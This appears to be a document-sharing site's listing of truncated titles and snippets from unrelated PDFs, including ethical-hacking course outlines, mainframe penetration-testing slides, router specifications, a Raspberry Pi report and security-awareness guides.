Everyday Digital Skills Projects Plus skills learned through the project Everyday Digital Skills Projects Plus skills learned through the project Embedded ICT skills printed on the back of each project. Compiled by Digital Learning Futures for NG Media Hints and tips Apps or

More information

AGENDA. A New Look at Mainframe Hacking And Penetration Testing 01/11/2016. World Class z Specialists

AGENDA. A New Look at Mainframe Hacking And Penetration Testing 01/11/2016. World Class z Specialists World Class z Specialists A New Look at Mainframe Hacking And Penetration Testing Delivering the best in z services, software, hardware and training. AGENDA What is the state of mainframe security? How

More information

Kevin Meehan Stephen Moskal Computer Architecture Winter 2012 Dr. Shaaban

Kevin Meehan Stephen Moskal Computer Architecture Winter 2012 Dr. Shaaban Kevin Meehan Stephen Moskal Computer Architecture Winter 2012 Dr. Shaaban Contents Raspberry Pi Foundation Raspberry Pi overview & specs ARM11 overview ARM11 cache, pipeline, branch prediction ARM11 vs.

More information

AC1200 Smart WiFi Router - Dual Band Gigabit

AC1200 Smart WiFi Router - Dual Band Gigabit Performance & Use WiFi speeds up to 300+900Mbps Wireless coverage for larger homes NETGEAR genie app Easily manage your home network IPV6 support for improved performance The NETGEAR Difference - 880MHz

More information

Quick Installation Guide

Quick Installation Guide Quick Installation Guide NEXTAV TM Cloud Hub - Table of Contents Product Features... 1 Ways to Connect... 1 Hardware and Accessories... 2 Product Parameters... 2 Minimum Hardware Requirements... 2 Product

More information

5. Execute the attack and obtain unauthorized access to the system.

5. Execute the attack and obtain unauthorized access to the system. Describe how a combination of preventive, detective, and corrective controls can be employed to provide reasonable assurance about information security. Before discussing the preventive, detective, and

More information

Course 831 Certified Ethical Hacker v9

Course 831 Certified Ethical Hacker v9 Course 831 Certified Ethical Hacker v9 Duration: 5 days What You Get: CEH v9 Certification exam voucher 5 days of high quality classroom training 18 comprehensive modules 40% of class hours dedicated to

More information

Main area: Security Additional areas: Digital Access, Information Literacy, Privacy and Reputation

Main area: Security Additional areas: Digital Access, Information Literacy, Privacy and Reputation Public Wi Fi Created: March 2016 Last Updated: July 2018 Estimated time: Group or individual activity: Ages: 60 minutes [10 minutes] Activity #1 [15 minutes] Activity #2 [10 minutes] Activity #3 [10 minutes]

More information

Ethical Hacking Foundation Exam Syllabus

Ethical Hacking Foundation Exam Syllabus 1 Table of contents Table of contents... 2 Exam Syllabus: Ethical Hacking Foundation... 3 Context... 3 Course objectives... 3 Target audience... 3 Prerequisites... 4 Exam information... 4 Examination details...

More information

This ethical hacking course puts you in the driver's seat of a hands-on environment with a systematic process.

This ethical hacking course puts you in the driver's seat of a hands-on environment with a systematic process. EC Council Certified Ethical Hacker V9 This ethical hacking course puts you in the driver's seat of a hands-on environment with a systematic process. Here, you will be exposed to an entirely different

More information

Vendor: CompTIA. Exam Code: Exam Name: CompTIA A+ Certification Exam (902) Version: Demo

Vendor: CompTIA. Exam Code: Exam Name: CompTIA A+ Certification Exam (902) Version: Demo Vendor: CompTIA Exam Code: 220-902 Exam Name: CompTIA A+ Certification Exam (902) Version: Demo DEMO QUESTION 1 Which of the following best practices is used to fix a zero-day vulnerability on Linux? A.

More information

How to Build a Culture of Security

How to Build a Culture of Security How to Build a Culture of Security March 2016 Table of Contents You are the target... 3 Social Engineering & Phishing and Spear-Phishing... 4 Browsing the Internet & Social Networking... 5 Bringing Your

More information

Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper

Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper Devanshu Bhatt Abstract: Penetration testing is extremely crucial method to discover weaknesses in systems and

More information

Hacking Ultimate Hacking Guide Hacking For Beginners And Tor Browser

Hacking Ultimate Hacking Guide Hacking For Beginners And Tor Browser Hacking Ultimate Hacking Guide Hacking For Beginners And Tor Browser We have made it easy for you to find a PDF Ebooks without any digging. And by having access to our ebooks online or by storing it on

More information